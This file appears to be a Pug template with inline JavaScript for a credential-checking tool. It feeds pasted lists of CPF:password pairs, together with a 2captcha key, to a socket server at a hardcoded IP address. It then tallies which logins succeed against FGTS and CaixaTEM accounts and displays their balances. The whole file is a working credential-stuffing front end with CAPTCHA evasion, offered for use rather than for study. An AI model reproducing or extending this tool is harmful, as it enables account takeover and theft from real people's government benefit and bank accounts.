doctype html
html
  head
    title= title
    link(rel='stylesheet' href='https://getbootstrap.com/docs/4.5/dist/css/bootstrap.min.css' crossorigin='anonymous')

    link(rel='stylesheet', href='/stylesheets/style.css')

  body(data-id="#{id}")
    block content
    script(src='https://code.jquery.com/jquery-3.2.1.min.js')
    script(src='https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js' crossorigin='anonymous')
    script(src='https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js' crossorigin='anonymous')
    script(src='/socket.io/socket.io.js')
    script(src='bower_components/async/dist/async.js')
    script.
        var socket = io.connect('185.177.59.182:3000');


        function deleteValue(val) {
         
            var textarea = document.getElementById("data");
            textarea.value = textarea.value.replace(val, "");
            textarea.value = textarea.value.replace("", null);
        }
        $('.chk').on('click', function(){
            var list = $('#data').val().split('\n');
            var count = $('#data').val().split('\n').length;
            var chkd = 0;
            var rep = 0;
            var apr = 0;

            if( list.length == 0 ){
                alert('Lista inválida!');
                return;
            }
            if( list[chkd] ){
                socket.emit('chk', {cpf: list[chkd].split(':'), container: $('body').data('id'), key: $('[name="2cap"]').val()});
                $('.chk').hide();
                $('.load').fadeIn();
                $('.stats').fadeIn()
                $('.cur-cap').text(list[chkd]);

                $('.chkd-cap').text(chkd+' de '+count+' - '+((100 * chkd) / count).toFixed(1)+'%');
            }else{
                alert('Lista inválida!');
            }
            socket.on('cxt', function(res){
                if( res.error ){
                    alert(res.msg);
                    $('.chk').fadeIn();
                    $('.load').hide();                        
                    return;
                }

                chkd++;
                $('.chkd-cap').text(chkd+' de '+count+' - '+((100 * chkd) / count).toFixed(1)+'%');
                
                var r = res;

                if( !res ){
                    socket.emit('chk', {cpf: list[chkd].split(':'), container: $('body').data('id'), key: $('[name="2cap"]').val()});
                        $('.cur-cap').text(list[chkd]);

                    return;
                }
                console.log(res);
                if( !r.fgts ){
                    socket.emit('chk', {cpf: list[chkd].split(':'), container: $('body').data('id'), key: $('[name="2cap"]').val()});
                    $('[data-id="'+r.sockId+'"]').find('.cur-cap').text(list[chkd]);

                    return;                
                }
                if( !r.cxt ){
                    socket.emit('chk', {cpf: list[chkd].split(':'), container: $('body').data('id'), key: $('[name="2cap"]').val()});
                    $('[data-id="'+r.sockId+'"]').find('.cur-cap').text(list[chkd]);

                    return;
                }
                let msgCTX = r.cxt.msg;
                if( r.cxt.good ){
                    msgCTX = '<span class="good">'+r.cxt.msg+'</span>';
                }
                var t = '<table class="table"><tbody><tr><th scope="row">Login</th><td>'+r.login+'</td></tr><tr><th scope="row">FGTS</th><td>'+r.fgts.msg+'</td></tr><tr><th scope="row">CaixaTEM</th><td>'+msgCTX+'</td></tr></tbody></table>';

                if(res.status == 1){
                    apr++;
                    $('[data-id="'+r.sockId+'"]').find('.apr-cap').text(apr);

                    $('[data-id="'+r.sockId+'"]').find('.aprov').append(t);
                }
                if(res.status == 0){
                    rep++;
                    $('[data-id="'+r.sockId+'"]').find('.rep-cap').text(rep);
                    $('[data-id="'+r.sockId+'"]').find('.repro').append(t);
                }
                if(res.status == 3){
                    rep++;
                    $('[data-id="'+r.sockId+'"]').find('.rep-cap').text(rep);
                    $('[data-id="'+r.sockId+'"]').find('.more').append(t);
                }

                $('[data-id="'+r.sockId+'"]').find('.2cap').text('$ '+res.balance);

            if( list[chkd] ){
                $('.cur-cap').text(list[chkd]);
                socket.emit('chk', {cpf: list[chkd].split(':'), container: $('body').data('id'), key: $('[name="2cap"]').val()});
                }else{ alert('Lista checada!');  $('.chk').fadeIn();
                $('.load').hide(); }
                $('textarea').val(function(_, val){    
                    return val.split('\n').slice(1).join('\n');
                });                
            })

        })



